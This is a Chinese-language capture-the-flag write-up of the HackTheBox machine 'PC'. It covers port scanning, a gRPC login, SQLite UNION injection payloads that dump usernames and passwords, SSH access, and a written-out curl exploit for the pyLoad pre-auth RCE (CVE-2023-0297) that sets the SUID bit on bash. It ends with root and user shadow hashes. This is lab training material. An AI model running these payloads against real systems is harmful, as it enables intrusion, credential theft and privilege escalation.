基本信息

https://app.hackthebox.com/machines/PC
10.10.11.214

端口扫描

需要全端口,有个50051：

$ nmap -p- -Pn 10.10.11.214
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-22 16:01 CST
Stats: 0:48:12 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 98.24% done; ETC: 16:50 (0:00:52 remaining)
Nmap scan report for 10.10.11.214
Host is up (0.093s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
50051/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 2940.26 seconds

gRPC 50051

搜索可以知道50051是gRPC:

GRPC Core: gRPC Server Reflection Tutorial
https://grpc.github.io/grpc/core/md_doc_server_reflection_tutorial.html

可以直接使用grpcui图形界面进行交互：

fullstorydev/grpcui: An interactive web UI for gRPC, along the lines of postman
https://github.com/fullstorydev/grpcui

1 2	brew install grpcui grpcui -plaintext 10.10.11.214:50051

SimpleApp

LoginUser

直接使用 admin : admin登录，得到一个id和token：

{
  "message": "Your id is 678."
}

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODQ3NTMxNjN9.5ZKS24POhkcG5Cn1zYcGnV4E70CbFH6gcsEflzMDzvU

(下面的图是一开始自己注册登录得到的结果，懒得改成admin了)

getinfo

然后使用得到的id和token调用getinfo：

sql注入

简单测试发现id处存在注入：

后面就一步步注入获取数据，sqlite数据库：

PayloadsAllTheThings/SQLite Injection.md at master · swisskyrepo/PayloadsAllTheThings · GitHub
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md

678 union select sqlite_version()

678 union SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
accounts

678 union SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='accounts'
CREATE TABLE "accounts" (username TEXT UNIQUE,password TEXT)

678 union SELECT GROUP_CONCAT(username) from accounts
admin,sau
678 union SELECT GROUP_CONCAT(password) from accounts
admin,HereIsYourPassWord1431

user flag

得到的sau用户账号密码，ssh登录：

1 2	sau HereIsYourPassWord1431

提权信息

简单枚举发现本地8000端口：

转发出来查看，发现是pyLoad：

1	ssh sau@10.10.11.214 -L 8000:127.0.0.1:8000

搜索可以发现相关漏洞：

Pre-auth RCE vulnerability found in pyload
https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/
bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad: CVE-2023-0297: The Story of Finding Pre-auth RCE in pyLoad
https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad

提权 & root flag

最简单的，直接给bash加个suid,注意编码：

1
2
3

curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"chmod%20%2bs%20/bin/bash\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://127.0.0.1:8000/flash/addcrypted2'

shadow

1
2

root:$6$DyP1KfBYGKoKi9P1$UiRaoILBpT81btxBn3Hzd5KmsRiijiMcR8J/F7ULWYvIMVzicsE3s/Yfyd20bypQUJ4utbJMRzYip4HT0s9ri.:19368:0:99999:7:::
sau:$6$Gx2uZX1oO0Qx6c3z$DUQFBRdrpJRsMo098RVb/o.QDhL.n9aKWRdjNrrn6VU4fnBkuhBOnjPz.Oiua5ZswZMrVn3UwfSje/fUWkJYv.:19368:0:99999:7:::

参考资料

GRPC Core: gRPC Server Reflection Tutorial
https://grpc.github.io/grpc/core/md_doc_server_reflection_tutorial.html
fullstorydev/grpcui: An interactive web UI for gRPC, along the lines of postman
https://github.com/fullstorydev/grpcui
PayloadsAllTheThings/SQLite Injection.md at master · swisskyrepo/PayloadsAllTheThings · GitHub
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md
Pre-auth RCE vulnerability found in pyload
https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/
bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad: CVE-2023-0297: The Story of Finding Pre-auth RCE in pyLoad
https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad

PC - HackTheBox

2023-05-22